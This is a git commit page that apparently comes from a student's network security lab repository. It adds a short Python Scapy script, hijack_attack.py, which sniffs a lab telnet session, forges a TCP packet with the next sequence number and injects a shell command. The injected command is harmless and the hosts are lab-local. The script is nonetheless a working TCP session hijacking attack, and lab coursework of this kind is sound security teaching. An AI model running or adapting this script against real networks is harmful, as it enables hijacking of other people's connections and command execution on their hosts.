tcp lab almost finished and mitnick lab initialized
This commit is contained in:
23
Tcp/Labsetup/volumes/hijack_attack.py
Normal file
23
Tcp/Labsetup/volumes/hijack_attack.py
Normal file
@@ -0,0 +1,23 @@
|
||||
#!/usr/bin/env python3
|
||||
from scapy.all import *
|
||||
|
||||
def hijack(pkt):
|
||||
if pkt[TCP].payload:
|
||||
data = bytes(pkt[TCP].payload)
|
||||
print("Packet from {} to {} with payload: {}".format(pkt[IP].src, pkt[IP].dst, data))
|
||||
|
||||
# Look for 'id' which I sent in the telnet session
|
||||
if b'id' in data:
|
||||
print("Target command detected. Injecting...")
|
||||
ip = IP(src=pkt[IP].src, dst=pkt[IP].dst)
|
||||
tcp = TCP(sport=pkt[TCP].sport, dport=pkt[TCP].dport, flags="A",
|
||||
seq=pkt[TCP].seq + len(pkt[TCP].payload), ack=pkt[TCP].ack)
|
||||
|
||||
payload = "\r touch /tmp/hijack_successful \r"
|
||||
res = ip/tcp/payload
|
||||
send(res, verbose=0)
|
||||
print("Sent hijacked packet.")
|
||||
exit(0)
|
||||
|
||||
print("Sniffing...")
|
||||
sniff(iface="br-603d3788c443", filter="tcp and src host 10.9.0.6 and dst host 10.9.0.5", prn=hijack)
|
||||
Reference in New Issue
Block a user